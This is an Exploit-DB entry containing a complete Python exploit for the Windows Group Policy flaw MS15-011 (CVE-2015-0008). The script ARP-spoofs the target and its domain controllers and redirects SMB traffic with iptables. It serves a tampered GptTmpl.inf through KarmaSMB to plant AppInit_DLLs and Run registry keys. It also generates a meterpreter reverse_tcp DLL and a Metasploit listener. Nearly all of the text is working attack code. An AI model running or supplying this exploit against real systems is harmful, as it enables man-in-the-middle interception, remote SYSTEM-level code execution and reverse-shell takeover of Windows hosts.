Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution (MS15-011)

EDB-ID:

47558




Platform:

Windows

Date:

2019-10-29


# Exploit Title: Microsoft Windows Server 2012 - 'Group Policy' Remote Code Execution
# Date: 2019-10-28
# Exploit Author: Thomas Zuk
# Version: Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, Windows Server 2008 R2, Windows 8, Windows Server 2012, 
# Windows RT, Windows 8.1, Windows Server 2012 R2, and Windows RT 8.1
# Tested on: Windows 7 , Windows Server 2012
# CVE : CVE-2015-0008
# Type: Remote
# Platform: Windows

# Description: While there exists multiple advisories for the vulnerability and video demos of 
# successful exploitation there is no public exploit-code for MS15-011 (CVE-2015-0008). This exploit code 
# targets vulnerable systems in order to modify registry keys to disable SMB signing, achieve SYSTEM level 
# remote code execution (AppInit_DLL) and a user level remote code execution (Run Keys).

#!/usr/bin/python3

import argparse
import os
import subprocess
import socket
import fcntl
import struct

# MS15-011 Exploit.
# For more information and any updates/additions this exploit see the following Git Repo: https://github.com/Freakazoidile/Exploit_Dev/tree/master/MS15-011
# Example usage: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -i eth1
# Example usage with multiple DC's: python3 ms15-011.py -t 172.66.10.2 -d 172.66.10.10 -d 172.66.10.11 -d 172.66.10.12 -i eth1
# Questions @Freakazoidile on twitter or make an issue on the GitHub repo. Enjoy.

def arpSpoof(interface, hostIP, targetIP):
    arpCmd = "arpspoof -i %s %s %s " % (interface, hostIP, targetIP)
    arpArgs = arpCmd.split()
    print("Arpspoofing: %s" % (arpArgs))
    p = subprocess.Popen(arpArgs, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)

    
def karmaSMB(hostIP):
    print("reverting GptTmpl.inf from bak")
    os.system("cp GptTmpl.inf.bak GptTmpl.inf")
    appInit = 'MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLs=1,"\\\\%s\\SYSVOL\\share.dll"\r\n' % (hostIP)
    CURunKey = 'MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Key=1,"rundll32.exe \\\\%s\\SYSVOL\\share.dll",1\r\n' % (hostIP)
    f = open("GptTmpl.inf","a", encoding='utf-16le')
    f.write(appInit)
    f.write(CURunKey)
    f.close()
    
    path = os.getcwd()
    
    fConfig = open("smb.conf","w")
    fConfig.write("ini = "+path+"/gpt.ini\ninf = "+path+"/GptTmpl.inf\ndll = "+path+"/shell.dll\n")
    fConfig.close()

    karmaCmd = "python karmaSMB.py -config smb.conf -smb2support ./ "
    os.system(karmaCmd)


def iptables_config(targetIP, hostIP):
    print('[+] Running command: echo "1" > /proc/sys/net/ipv4/ip_forward')
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    print('[+] Running command: iptables -t nat -A POSTROUTING -j MASQUERADE')
    os.system('echo "1" > /proc/sys/net/ipv4/ip_forward')
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 445 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A PREROUTING -p tcp -s %s --destination-port 139 -j DNAT --to-destination %s' % (targetIP, hostIP))
    os.system('iptables -t nat -A POSTROUTING -j MASQUERADE')


def get_interface_address(ifname):
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    return socket.inet_ntoa(fcntl.ioctl(s.fileno(), 0x8915, struct.pack('256s', bytes(ifname[:15], 'utf-8')))[20:24])

def generatePayload(lhost, lport):
    print("generating payload(s) and metasploit resource file")
    msfDll = "msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=%s lport=%s -f dll -o shell.dll" % (lhost, lport)
    os.system(msfDll)
    msfResource = "use multi/handler\nset payload windows/x64/meterpreter/reverse_tcp\nset lhost %s\nset lport %s\nset exitonsession false\nexploit -j\n" % (lhost, lport)
    print("metasploit resource script: %s" % msfResource)
    print ("metasploit resource script written to meta_resource.rc type 'msfconsole -r meta_resource.rc' to launch metasploit and stage a listener automatically")
    
    file = open("meta_resource.rc", "w+")
    file.write(msfResource)
    file.close()
        


if __name__ == '__main__':

    parser = argparse.ArgumentParser()

    # Add arguments
    parser.add_argument("-t", "--target_ip", help="The IP of the target machine vulnerable to ms15-011/14", required=True)
    parser.add_argument("-d", "--domain_controller", help="The IP of the domain controller(s) in the target domain. Use this argument multiple times when multiple domain contollers are preset.\nE.G: -d 172.66.10.10 -d 172.66.10.11", action='append', required=True)
    parser.add_argument("-i", "--interface", help="The interface to use. E.G eth0", required=True)
    parser.add_argument("-l", "--lhost", help="The IP to listen for incoming connections on for reverse shell. This is optional, uses the IP from the provided interface by default. E.G 192.168.5.1", required=False)
    parser.add_argument("-p", "--lport", help="The port to listen connections on for reverse shell. If not specified 4444 is used. E.G 443", required=False)

    args = parser.parse_args()

    # Check for KarmaSMB and GptTmpl.inf.bak, if missing download git repo with these files.
    print ("checking for missing file(s)")
    if not os.path.isfile("karmaSMB.py") and not os.path.isfile("GptTmpl.inf.bak"):
        print("Requirements missing. Downloading required files from github")
        os.system("git clone https://github.com/Freakazoidile/MS15-011-Files")
        os.system("mv MS15-011-Files/* . && rm -rf MS15-011-Files/")

    # Get the provided interfaces IP address
    ipAddr = get_interface_address(args.interface)

    if args.lhost is not None:
        lhost = args.lhost
    else:
        lhost = ipAddr

    if args.lport is not None:
        lport = args.lport
    else:
        lport = '4444'
    

    dcSpoof = ""
    dcCommaList = ""
    count = 0
  
    # loop over the domain controllers, poison each and target the host IP
    # create a comma separated list of DC's
    # create a "-t" separate list of DC's for use with arpspoof
    for dc in args.domain_controller:
        dcSpoof += "-t %s " % (dc)
        if count > 0: 
            dcCommaList += ",%s" % (dc)
        else:
            dcCommaList += "%s" % (dc)

        arpSpoof(args.interface, dc, "-t %s" % (args.target_ip))
        count += 1

    # arpspoof the target and all of the DC's
    arpSpoof(args.interface, args.target_ip, dcSpoof)

    # generate payloads
    generatePayload(lhost, lport)

    # Setup iptables forwarding rules
    iptables_config(args.target_ip, ipAddr)

    #run Karmba SMB Server
    karmaSMB(ipAddr)
   
    
    print("Targeting %s by arp spoofing %s and domain controllers: %s " % (args.target_ip, args.target_ip, args.domain_controllers))
    print("If you interupt/stop the exploit ensure you stop all instances of arpspoof and flush firewall rules!")